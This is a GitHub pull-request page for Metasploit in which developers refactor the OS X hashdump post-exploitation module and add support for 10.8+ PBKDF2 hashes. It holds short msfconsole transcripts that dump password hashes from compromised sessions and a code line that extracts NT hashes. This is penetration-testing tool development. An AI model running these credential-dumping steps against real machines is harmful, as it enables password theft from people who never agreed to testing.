Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Refactor OSX hashdump post module and add support for 10.8+ hashes #2735

Merged
merged 8 commits into from Dec 10, 2013
Merged

Refactor OSX hashdump post module and add support for 10.8+ hashes #2735

merged 8 commits into from Dec 10, 2013

Conversation

jvennix-r7
Copy link
Contributor

  • Adds support for MATCHUSER datastore regexp
  • Adds support for OSX 10.8 and 10.9 hashes (PBKDF2)
  • DRYs up a bunch of older code, adds lots of helper fns

Note that the enum_osx post module duplicates the functionality for hashdump. I am purposefully not updating the duplicate, as this is a bad pattern, and I am in the middle of refactoring enum_osx anyways (branch name refactor_osx_enum).

Verification steps:

  • Module successfully dumps hashes on a OSX session on 10.6 or below
  • Module successfully dumps hashes on a OSX session on 10.7
  • Module successfully dumps hashes on a OSX session on 10.8 or 10.9
  • Ensure that the MATCHUSERS datastore option works as expected

In each instance, verify that the dumped hash is identical to what Dave Grohl outputs with this command:

./dave --john=<username>

@joevennix
Refactor OSX hashdump post module.
969f45f 
* Adds support for MATCHUSER regex option
* Adds support for OSX 10.8 and 10.9 hashes (PBKDF2)
* DRYs up a bunch of older code, adds lots of helper fns
* Ends up shaving off ~20 lines
@joevennix
Fix description, kill dead constant.
eacab1b
@joevennix
Fix MATCHUSER bug.
f981a04 
* Also add spacing and indentation for better readability.
* Refactors grab_shadow_blob method.
@joevennix
Supports 10.3
9b34a8f
@joevennix
Make pipe part of /bin/bash cmd.
7f3ab14
@joevennix
Make sure loot is named correctly.
df76651
@jvazquez-r7
Copy link
Contributor

Processing...

@jvazquez-r7
Copy link
Contributor

Tested successfully on mavericks:

msf exploit(handler) > use post/osx/gather/hashdump 
msf post(hashdump) > set session 2
session => 2
msf post(hashdump) > run

[*] Attempting to grab shadow for user juan...
[+] SHA512:....blahblahblah
[+] Unshadowed Password File: /Users/juan/.msf4/loot/20131209080431_default_192.168.172.1_osx.hashes.sha51_.txt
[*] Post module execution completed

@jvennix-r7 were you able to test on 10.6 / 10.7, I haven't 10.6/10.7 available to test. So if you did and could provide output, will be enough to me to land :)

jvazquez-r7
jvazquez-r7 reviewed Dec 9, 2013
View reviewed changes
modules/post/osx/gather/hashdump.rb

# Check if NT HASH is present
if hash_decoded =~ /4F1010/
report_nt_hash(hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)[0][0])
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I miss a second argument for report_nt_hash

@jvennix-r7
Copy link
Contributor Author

@jvazquez-r7 sure I'll test on those later today

@jvennix-r7
Copy link
Contributor Author

@kgray-r7 is going to verify 10.6 and 10.8, I'll re-verify 10.7 later

@jvennix-r7
Copy link
Contributor Author

Found a bug in 10.5/6, fixed and verified working:

msf exploit(handler) > sessions -i 1 -c 'uname -a'
Darwin Mac-Pro.local 9.4.0 Darwin Kernel Version 9.4.0: Fri Aug  1 21:34:49 EST 2008; ToH & StageXNU:xnu-1228.5.20/BUILD/obj/RELEASE_I386 i386
msf exploit(handler) > use post/osx/gather/hashdump
msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > run
[*] Running module against Mac-Pro.local
[*] This session is running as root!
[*] Dumping Hashes
[*] SHA1:Admin:<sha hash for pass1234>
[+] Unshadowed Password File: /Users/joe/.msf4/loot/20131209192430_default_192.168.0.5_osx.hashes.sha1_614263.txt
[*] Post module execution completed

@jvennix-r7
Copy link
Contributor Author

Working well in 10.7:

msf post(hashdump) > sessions -i 2 -c 'uname -a'
Darwin joes-Mac.local 11.0.0 Darwin Kernel Version 11.0.0: Sat Jun 18 12:56:35 PDT 2011; root:xnu-1699.22.73~1/RELEASE_X86_64 x86_64
msf post(hashdump) > set session 2
session => 2
msf post(hashdump) > run
[*] Attempting to grab shadow for user joe...
[*] SHA512:joe:....my sha512 hash....
[+] Unshadowed Password File: /Users/joe/.msf4/loot/20131209193243_default_192.168.0.5_osx.hashes.sha51_049038.txt
[*] Post module execution completed

@jvazquez-r7
Copy link
Contributor

Thanks @jvennix-r7 and @kgray-r7 , proceeding with landing!

jvazquez-r7 added a commit that referenced this pull request Dec 10, 2013
@jvazquez-r7
Land #2735, @jvennix-r7 support of 10.8+ on osx hashdump
2ef3caa
@jvazquez-r7 jvazquez-r7 merged commit 06b651d into rapid7:master Dec 10, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvennix-r7 @jvazquez-r7 @joevennix